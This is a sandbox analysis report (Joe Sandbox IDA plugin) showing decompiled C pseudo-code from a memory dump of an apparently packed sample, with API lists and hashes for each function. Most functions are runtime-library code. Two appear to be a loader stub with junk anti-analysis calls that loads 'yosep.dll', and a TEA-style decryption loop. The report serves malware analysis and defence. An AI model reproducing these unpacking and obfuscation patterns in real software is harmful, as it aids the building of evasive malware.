Associated: 0000000A.00000002.553733662.0000000000418000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.554251125.0000000000477000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.554282068.000000000047B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_1E3.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 19e61f63fe2f75a2d166a63ff340277e33a9eaffe2633fe00331c4b57e2baeab
Instruction ID: 7830314477c359c329c9d4a462b38d35abe9eb27a05c43c7fd05095a650af302
Opcode Fuzzy Hash: 19e61f63fe2f75a2d166a63ff340277e33a9eaffe2633fe00331c4b57e2baeab
Instruction Fuzzy Hash: 19D05E729943445AEB105FB1AD08B623BDCD384395F00843ABA0DC66A0E674D991C608

Uniqueness

Uniqueness Score: -1.00%

Function 0040619B Relevance: 1.5, APIs: 1, Instructions: 4
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040619B() {
				void* _t1;

				_t1 = E00406129(0); // executed
				return _t1;
			}

0x0040619d
0x004061a3

APIs

__encode_pointer.LIBCMT ref: 0040619D

Part of subcall function 00406129: TlsGetValue.KERNEL32(00000000,?,004061A2,00000000,0040A3A5,00477B30,00000000,00000314), ref: 0040613B
Part of subcall function 00406129: TlsGetValue.KERNEL32(00000004,?,004061A2,00000000,0040A3A5,00477B30,00000000,00000314), ref: 00406152
Part of subcall function 00406129: RtlEncodePointer.NTDLL(?,?,004061A2,00000000,0040A3A5,00477B30,00000000,00000314), ref: 00406190

Memory Dump Source

Source File: 0000000A.00000002.553571616.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.553534581.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.553680188.0000000000411000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.553733662.0000000000418000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.554251125.0000000000477000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.554282068.000000000047B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_1E3.jbxd

Similarity

API ID: Value$EncodePointer__encode_pointer
String ID:
API String ID: 2585649348-0
Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction ID: e87044ab682afd9b7b1670cd61dbbbfcd87b06b4ecde40ab423a09c9dfcd5251
Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00405EC0 Relevance: 7.6, APIs: 5, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E00405EC0(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x4116f8; // 0x75bc5e32
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x478348 = _t6;
				 *0x478344 = _t22;
				 *0x478340 = _t25;
				 *0x47833c = _t21;
				 *0x478338 = _t27;
				 *0x478334 = _t26;
				 *0x478360 = ss;
				 *0x478354 = cs;
				 *0x478330 = ds;
				 *0x47832c = es;
				 *0x478328 = fs;
				 *0x478324 = gs;
				asm("pushfd");
				_pop( *0x478358);
				 *0x47834c =  *_t31;
				 *0x478350 = _v0;
				 *0x47835c =  &_a4;
				 *0x478298 = 0x10001;
				 *0x47824c =  *0x478350;
				 *0x478240 = 0xc0000409;
				 *0x478244 = 1;
				_t12 =  *0x4116f8; // 0x75bc5e32
				_v812 = _t12;
				_t13 =  *0x4116fc; // 0x8a43a1cd
				_v808 = _t13;
				 *0x478290 = IsDebuggerPresent();
				_push(1);
				E004091B5(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x401a98);
				if( *0x478290 == 0) {
					_push(1);
					E004091B5(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x00405ec0
0x00405ec0
0x00405ec0
0x00405ec0
0x00405ec0
0x00405ec0
0x00405ec0
0x00405ec6
0x00405ec8
0x00405ec8
0x0040a6e5
0x0040a6ea
0x0040a6f0
0x0040a6f6
0x0040a6fc
0x0040a702
0x0040a708
0x0040a70f
0x0040a716
0x0040a71d
0x0040a724
0x0040a72b
0x0040a732
0x0040a733
0x0040a73c
0x0040a744
0x0040a74c
0x0040a757
0x0040a766
0x0040a76b
0x0040a775
0x0040a77f
0x0040a784
0x0040a78a
0x0040a78f
0x0040a79b
0x0040a7a0
0x0040a7a2
0x0040a7aa
0x0040a7b5
0x0040a7c2
0x0040a7c4
0x0040a7c6
0x0040a7cb
0x0040a7df

APIs

IsDebuggerPresent.KERNEL32 ref: 0040A795
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040A7AA
UnhandledExceptionFilter.KERNEL32(00401A98), ref: 0040A7B5
GetCurrentProcess.KERNEL32(C0000409), ref: 0040A7D1
TerminateProcess.KERNEL32(00000000), ref: 0040A7D8

Memory Dump Source

Source File: 0000000A.00000002.553571616.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.553534581.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.553680188.0000000000411000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.553733662.0000000000418000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.554251125.0000000000477000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.554282068.000000000047B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_1E3.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: b1c45dec5dc76a2f7711566ddacc07ae3a58d3990441d9bfa468130bae3f9e39
Instruction ID: e78aba716c159d7bb806c340f08f852017787b479a2d51dfdac945b03bb9496c
Opcode Fuzzy Hash: b1c45dec5dc76a2f7711566ddacc07ae3a58d3990441d9bfa468130bae3f9e39
Instruction Fuzzy Hash: D921EDB49813048BD350DF68E9496643BA4FB08B15F14407EEA0CA7671EB7658C18F5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040297F Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 110
librarythreadmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E0040297F(void* __ecx) {
				void* _v6;
				long _v8;
				short _v2056;
				struct HINSTANCE__* _t10;
				_Unknown_base(*)()* _t11;
				void* _t14;
				struct HINSTANCE__* _t25;
				void* _t33;
				void* _t35;
				intOrPtr _t36;
				void* _t37;
				void* _t40;
				void* _t42;

				_t35 = __ecx;
				if( *0x479904 == 0x412) {
					E00403B0A(0);
					E00403AE9(0, 0);
					E00403DC0(0);
				}
				 *0x479904 =  *0x479904 + 0xb2d3b;
				_t10 = GetModuleHandleA("kernel32.dll");
				 *0x479758 = _t10;
				_t11 = GetProcAddress(_t10, "LocalAlloc");
				 *0x4796cc = _t11;
				 *0x4796c8 =  *_t11(0,  *0x479904);
				E004028BE(_t35);
				_t36 =  *0x479904;
				_t14 = 0;
				if(_t36 > 0) {
					do {
						 *((char*)( *0x4796c8 + _t14)) =  *((intOrPtr*)( *0x479908 + _t14 + 0xb2d3b));
						_t14 = _t14 + 1;
					} while (_t14 < _t36);
				}
				_t40 = 0;
				do {
					if(_t36 + _t40 == 0x5e) {
						GetCurrentThreadId();
						VirtualAlloc(0, 0, 0, 0);
						ReadConsoleA(0, 0, 0, 0, 0);
						_t36 =  *0x479904;
					}
					_t40 = _t40 + 1;
				} while (_t40 < 0x40c893);
				E00402834();
				_t37 = 0;
				do {
					if(_t37 == 0x770e) {
						E004028A4(_t37);
					}
					_t37 = _t37 + 1;
				} while (_t37 < 0x286b97d);
				_t33 = 0x7b;
				do {
					if( *0x479904 == 0xf) {
						_v8 = 0;
						asm("stosw");
						_push( &_v8);
						_push(0);
						_push(0);
						L0040392E();
						LockResource(0);
					}
					_t33 = _t33 - 1;
				} while (_t33 != 0);
				_t42 = 0x184cc;
				do {
					if( *0x479904 == 0x1833b) {
						GetComputerNameW( &_v2056,  &_v8);
						__imp__SetThreadExecutionState(0);
						TlsSetValue(0, 0);
					}
					_t42 = _t42 - 1;
				} while (_t42 != 0);
				_t25 = LoadLibraryW(L"yosep.dll");
				E00402973();
				return _t25;
			}

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004029BD
GetProcAddress.KERNEL32(00000000,LocalAlloc), ref: 004029CE
GetCurrentThreadId.KERNEL32 ref: 00402A1F
VirtualAlloc.KERNEL32(00000000,00000000,00000000,00000000), ref: 00402A29
ReadConsoleA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00402A34
SetConsoleDisplayMode.KERNEL32(00000000,00000000,?), ref: 00402A84
LockResource.KERNEL32(00000000,00000000,00000000,?), ref: 00402A8A
GetComputerNameW.KERNEL32 ref: 00402AB0
SetThreadExecutionState.KERNEL32 ref: 00402AB7
TlsSetValue.KERNEL32(00000000,00000000), ref: 00402ABF
LoadLibraryW.KERNEL32(yosep.dll), ref: 00402ACD

Part of subcall function 00403B0A: __wcstoi64.LIBCMT ref: 00403B16

Part of subcall function 00403DC0: _doexit.LIBCMT ref: 00403DCC

Strings

yosep.dll, xrefs: 00402AC8
LocalAlloc, xrefs: 004029C3
kernel32.dll, xrefs: 004029B8

Memory Dump Source

Source File: 0000000A.00000002.553571616.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.553534581.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.553680188.0000000000411000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.553733662.0000000000418000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.554251125.0000000000477000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.554282068.000000000047B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_1E3.jbxd

Similarity

API ID: ConsoleThread$AddressAllocComputerCurrentDisplayExecutionHandleLibraryLoadLockModeModuleNameProcReadResourceStateValueVirtual__wcstoi64_doexit
String ID: LocalAlloc$kernel32.dll$yosep.dll
API String ID: 1649761710-3699620503
Opcode ID: 53d9cc72a4315a1d6753bead965aef412282e3ae9e73b73b9b74afe0ddc2f886
Instruction ID: 7e296469edf81c510a001de488f7b4e86d12bb8e6c09a60258ccd1e5f65f88a3
Opcode Fuzzy Hash: 53d9cc72a4315a1d6753bead965aef412282e3ae9e73b73b9b74afe0ddc2f886
Instruction Fuzzy Hash: EC3126B5902125BBC721AB61AF4C9DF3B68EF45314710443AF109F22E1DBBC5A85CBAD

Uniqueness

Uniqueness Score: -1.00%

Function 00406290 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E00406290(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t23;
				intOrPtr _t28;
				intOrPtr _t32;
				void* _t40;
				intOrPtr _t46;
				void* _t47;

				_t35 = __ebx;
				_push(0xc);
				_push(0x40fe60);
				E0040487C(__ebx, __edi, __esi);
				_t45 = L"KERNEL32.DLL";
				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t23 == 0) {
					_t23 = E00403B20(_t45);
				}
				 *(_t47 - 0x1c) = _t23;
				_t46 =  *((intOrPtr*)(_t47 + 8));
				 *((intOrPtr*)(_t46 + 0x5c)) = 0x401868;
				 *((intOrPtr*)(_t46 + 0x14)) = 1;
				if(_t23 != 0) {
					_t35 = GetProcAddress;
					 *((intOrPtr*)(_t46 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
					 *((intOrPtr*)(_t46 + 0x1fc)) = GetProcAddress( *(_t47 - 0x1c), "DecodePointer");
				}
				 *((intOrPtr*)(_t46 + 0x70)) = 1;
				 *((char*)(_t46 + 0xc8)) = 0x43;
				 *((char*)(_t46 + 0x14b)) = 0x43;
				 *(_t46 + 0x68) = 0x4118a8;
				E00406842(_t35, _t40, 1, 0xd);
				 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
				InterlockedIncrement( *(_t46 + 0x68));
				 *(_t47 - 4) = 0xfffffffe;
				E00406365();
				E00406842(_t35, _t40, 1, 0xc);
				 *(_t47 - 4) = 1;
				_t28 =  *((intOrPtr*)(_t47 + 0xc));
				 *((intOrPtr*)(_t46 + 0x6c)) = _t28;
				if(_t28 == 0) {
					_t32 =  *0x411eb0; // 0x411dd8
					 *((intOrPtr*)(_t46 + 0x6c)) = _t32;
				}
				E00408D2A( *((intOrPtr*)(_t46 + 0x6c)));
				 *(_t47 - 4) = 0xfffffffe;
				return E004048C1(E0040636E());
			}

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,0040FE60,0000000C,004063CB,00000000,00000000,?,004075F1,?), ref: 004062A2
__crt_waiting_on_module_handle.LIBCMT ref: 004062AD

Part of subcall function 00403B20: Sleep.KERNEL32(000003E8,00000000,?,004061F3,KERNEL32.DLL,?,0040623F,?,004075F1,?), ref: 00403B2C
Part of subcall function 00403B20: GetModuleHandleW.KERNEL32(?,?,004061F3,KERNEL32.DLL,?,0040623F,?,004075F1,?), ref: 00403B35

GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 004062D6
GetProcAddress.KERNEL32(?,DecodePointer), ref: 004062E6
__lock.LIBCMT ref: 00406308
InterlockedIncrement.KERNEL32(004118A8), ref: 00406315
__lock.LIBCMT ref: 00406329
___addlocaleref.LIBCMT ref: 00406347

Strings

DecodePointer, xrefs: 004062DE
KERNEL32.DLL, xrefs: 0040629C, 004062A1, 004062AC
EncodePointer, xrefs: 004062CA

Memory Dump Source

Source File: 0000000A.00000002.553571616.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.553534581.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.553680188.0000000000411000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.553733662.0000000000418000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.554251125.0000000000477000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.554282068.000000000047B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_1E3.jbxd

Similarity

API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1028249917-2843748187
Opcode ID: 7daa365c4f1f3c6f5620963537f9db8d2fb6a0a2d92353cab0785856933f005d
Instruction ID: c5f7f4d4a171d92e4fd546218ba084379517a2aa08b604ccda2bde3c11c0c46e
Opcode Fuzzy Hash: 7daa365c4f1f3c6f5620963537f9db8d2fb6a0a2d92353cab0785856933f005d
Instruction Fuzzy Hash: 4A1160719047059AD720AF7AD845B4ABBE4EF04314F10857FE99AB36E1CB789A40CB5C

Uniqueness

Uniqueness Score: -1.00%

Function 004026CF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E004026CF(unsigned int* __edi, void* __eflags) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				long _v56;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t70;
				intOrPtr _t71;
				intOrPtr _t75;
				unsigned int _t95;
				unsigned int* _t104;
				unsigned int _t105;

				_t104 = __edi;
				_v16 =  *__edi;
				_t66 =  *0x412548; // 0x824f09e0
				_v48 = _t66;
				_t67 =  *0x41254c; // 0xd8c85a56
				_t105 = __edi[1];
				_v52 = _t67;
				_v32 = 0;
				E004026C5( &_v32);
				_t70 =  *0x412550; // 0x3a0d5c64
				_v32 = _v32 + 0x23f;
				_v40 = _t70;
				_t71 =  *0x412554; // 0x7f349909
				_v44 = _t71;
				_v36 = 0x20;
				do {
					_v24 = 2;
					_v24 = _v24 + 3;
					_v8 = (_v16 << 4) + _v40;
					_t75 =  *0x479904;
					if(_t75 == 0xfa9) {
						 *0x479764 = 0xedeb2e40;
					}
					if(_t75 == 0x3eb) {
						InterlockedExchange( &_v56, 0);
						 *0x4796c4 = 0;
					}
					_v20 = _v16;
					_v20 = _v20 + _v32;
					_v12 = _v16 >> 5;
					 *0x479760 = 0xf4ea3dee;
					E004026CC( &_v12, _v44);
					_v8 = _v8 ^ _v20;
					if( *0x479904 == 0x9e6) {
						GetTickCount();
					}
					_v12 = _v12 ^ _v8;
					if( *0x479904 == 0x213) {
						OpenFileMappingW(0, 0, 0);
						__imp__DeleteVolumeMountPointA(0);
					}
					_t105 = _t105 - _v12;
					_v28 = 2;
					_v28 = _v28 - 0x5396dd36;
					_v28 = _v28 + 0x5396dd38;
					_v8 = _t105 << _v28;
					_v8 = _v8 + _v48;
					_v20 = _v32 + _t105;
					_v12 = (_t105 >> _v24) + _v52;
					_v8 = _v8 ^ _v20;
					_v8 = _v8 ^ _v12;
					 *0x478664 = 0;
					_v16 = _v16 - _v8;
					_v32 = _v32 + 0x61c88647;
					_t61 =  &_v36;
					 *_t61 = _v36 - 1;
				} while ( *_t61 != 0);
				_t95 = _v16;
				_t104[1] = _t105;
				 *_t104 = _t95;
				return _t95;
			}

APIs

InterlockedExchange.KERNEL32(?,00000000), ref: 00402753
GetTickCount.KERNEL32 ref: 0040279B
OpenFileMappingW.KERNEL32(00000000,00000000,00000000), ref: 004027B6
DeleteVolumeMountPointA.KERNEL32 ref: 004027BD

Strings

, xrefs: 00402713

Memory Dump Source

Source File: 0000000A.00000002.553571616.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.553534581.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.553680188.0000000000411000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.553733662.0000000000418000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.554251125.0000000000477000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.554282068.000000000047B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_1E3.jbxd

Similarity

API ID: CountDeleteExchangeFileInterlockedMappingMountOpenPointTickVolume
String ID:
API String ID: 4198633837-3916222277
Opcode ID: a3de9b9d2199c9496f721bdb8be8d5d2553ec54f29bfe42e6fd289c16606e40d
Instruction ID: 959d9536cc2af01ebd0cb0a7c350fa0603deb3360d6281285ca61861da0f28bc
Opcode Fuzzy Hash: a3de9b9d2199c9496f721bdb8be8d5d2553ec54f29bfe42e6fd289c16606e40d
Instruction Fuzzy Hash: 92419FB5D01219EFDB40DFA8DA89A9EBBF4FB18314F10846AE415F3250D374AA45CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00408724 Relevance: 7.5, APIs: 5, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E00408724(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t29;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x40ffd8);
				E0040487C(__ebx, __edi, __esi);
				_t31 = E004063F0(__ebx, _t35);
				_t15 =  *0x411dcc; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E00406842(_t25, _t29, _t31, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x411cd0; // 0x751860
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x4118a8;
								if(__eflags != 0) {
									_push(_t33);
									E004081A8(_t25, _t29, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x411cd0; // 0x751860
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x411cd0; // 0x751860
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E004087BF();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E00403B50(0x20);
				}
				return E004048C1(_t33);
			}

APIs

__getptd.LIBCMT ref: 00408730

Part of subcall function 004063F0: __getptd_noexit.LIBCMT ref: 004063F3
Part of subcall function 004063F0: __amsg_exit.LIBCMT ref: 00406400

__amsg_exit.LIBCMT ref: 00408750
__lock.LIBCMT ref: 00408760
InterlockedDecrement.KERNEL32(?), ref: 0040877D
InterlockedIncrement.KERNEL32(00751860), ref: 004087A8

Memory Dump Source

Source File: 0000000A.00000002.553571616.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.553534581.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.553680188.0000000000411000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.553733662.0000000000418000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.554251125.0000000000477000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.554282068.000000000047B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_1E3.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 71ae38c397efa0934501c7a6d8e97c1f7f49a7ad680cb9b166df224390bfadfa
Instruction ID: 3afbc463ed8f73c63c96e670660ec91d28aa376d58571e4cd45f615bcc75b0f2
Opcode Fuzzy Hash: 71ae38c397efa0934501c7a6d8e97c1f7f49a7ad680cb9b166df224390bfadfa
Instruction Fuzzy Hash: A2018B329406119BCB20BB2A9E4578A7360BB00794F20813FE984776E5CF3CA941CBDD

Uniqueness

Uniqueness Score: -1.00%

Function 004081A8 Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 41%

			E004081A8(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t24;
				void* _t26;

				_push(0xc);
				_push(0x40ff70);
				_t8 = E0040487C(__ebx, __edi, __esi);
				_t24 =  *((intOrPtr*)(_t26 + 8));
				if(_t24 == 0) {
					L9:
					return E004048C1(_t8);
				}
				if( *0x479930 != 3) {
					_push(_t24);
					L7:
					if(HeapFree( *0x4781d4, 0, ??) == 0) {
						_t10 = E00404382();
						 *_t10 = E00404340(GetLastError());
					}
					goto L9;
				}
				E00406842(__ebx, __edx, __edi, 4);
				 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
				_t13 = E00407605(_t24);
				 *((intOrPtr*)(_t26 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t24);
					_push(_t13);
					E00407635();
				}
				 *(_t26 - 4) = 0xfffffffe;
				_t8 = E004081FE();
				if( *((intOrPtr*)(_t26 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t26 + 8)));
					goto L7;
				}
			}

APIs

__lock.LIBCMT ref: 004081C6

Part of subcall function 00406842: __mtinitlocknum.LIBCMT ref: 00406858
Part of subcall function 00406842: __amsg_exit.LIBCMT ref: 00406864
Part of subcall function 00406842: EnterCriticalSection.KERNEL32(?,?,?,0040444C,00000004,0040FE20,0000000C,00408124,?,?,00000000,00000000,00000000,?,004063A2,00000001), ref: 0040686C

___sbh_find_block.LIBCMT ref: 004081D1
___sbh_free_block.LIBCMT ref: 004081E0
HeapFree.KERNEL32(00000000,?,0040FF70,0000000C,00406823,00000000,0040FEB0,0000000C,0040685D,?,?,?,0040444C,00000004,0040FE20,0000000C), ref: 00408210
GetLastError.KERNEL32(?,0040444C,00000004,0040FE20,0000000C,00408124,?,?,00000000,00000000,00000000,?,004063A2,00000001,00000214), ref: 00408221

Memory Dump Source

Source File: 0000000A.00000002.553571616.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.553534581.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.553680188.0000000000411000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.553733662.0000000000418000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.554251125.0000000000477000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.554282068.000000000047B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_1E3.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: db03fb04e2f12cb5f9b8e4092e04a331ef1d498928472dc22a03220a7c16e63a
Instruction ID: ab5e074dddd761f2974dda4b056a856c15a9ed6b9620148ccf24a2c8c0a558f6
Opcode Fuzzy Hash: db03fb04e2f12cb5f9b8e4092e04a331ef1d498928472dc22a03220a7c16e63a
Instruction Fuzzy Hash: E101D671905B01AAEB207BB29D0AB5F3B64AF00368F10457FF5857A1D2CF3C99418AAD

Uniqueness

Uniqueness Score: -1.00%

Function 00409E57 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00409E57() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x4019f8;
					_v28 =  *0x4019f0;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}

APIs

GetModuleHandleA.KERNEL32(KERNEL32,00404ADC), ref: 00409E5C
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00409E6C

Strings

KERNEL32, xrefs: 00409E57
IsProcessorFeaturePresent, xrefs: 00409E66

Memory Dump Source

Source File: 0000000A.00000002.553571616.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.553534581.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.553680188.0000000000411000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.553733662.0000000000418000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.554251125.0000000000477000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.554282068.000000000047B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_1E3.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: a592ca076a3aea64c9ee387a4fddd7a4033359cafd30385b84a4aba461cebe9d
Instruction ID: e51290182a2e1e9a96986d294ad1c7ef0f1965be230ab9cad6a7acab8c16fd01
Opcode Fuzzy Hash: a592ca076a3aea64c9ee387a4fddd7a4033359cafd30385b84a4aba461cebe9d
Instruction Fuzzy Hash: B2F0367064050EE2DF005BB1FD1976F7A74BB80785F5505B1E1D2B00D9DF348871D68A

Uniqueness

Uniqueness Score: -1.00%

